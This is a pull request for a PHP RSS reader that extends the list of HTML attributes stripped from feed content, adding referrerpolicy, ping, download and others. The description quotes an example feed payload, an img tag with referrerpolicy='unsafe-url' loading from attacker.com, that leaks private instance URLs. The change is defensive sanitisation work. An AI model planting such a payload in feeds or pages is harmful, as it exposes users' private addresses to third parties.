### PR TITLE
Strip more unsafe attributes e.g. `referrerpolicy`

### DIFF
--- a/lib/lib_rss.php
+++ b/lib/lib_rss.php
@@ -348,7 +348,8 @@ function customSimplePie(array $attributes = [], array $curl_options = []): \Sim
 		'link', 'onblur', 'onchange', 'onclick', 'ondblclick', 'onfocus',
 		'onkeydown', 'onkeypress', 'onkeyup', 'onload', 'onmousedown', 'onmousemove',
 		'onmouseout', 'onmouseover', 'onmouseup', 'onselect', 'onunload',
-		'seamless', 'sizes', 'srcdoc', 'srcset', 'text', 'vlink',
+		'seamless', 'sizes', 'srcdoc', 'srcset', 'text', 'vlink', 'referrerpolicy', 'ping',
+		'target', 'rel', 'name', 'download', 'attributionsrc',
 	]));
 	$simplePie->add_attributes([
 		'audio' => ['controls' => 'controls', 'preload' => 'none'],


### PR DESCRIPTION
Especially `referrerpolicy`, feeds can use: `<img referrerpolicy="unsafe-url" src="https://attacker.com">` to collect instance URLs (which are meant to be private)

We should start using a whitelist for attributes/tags at some point
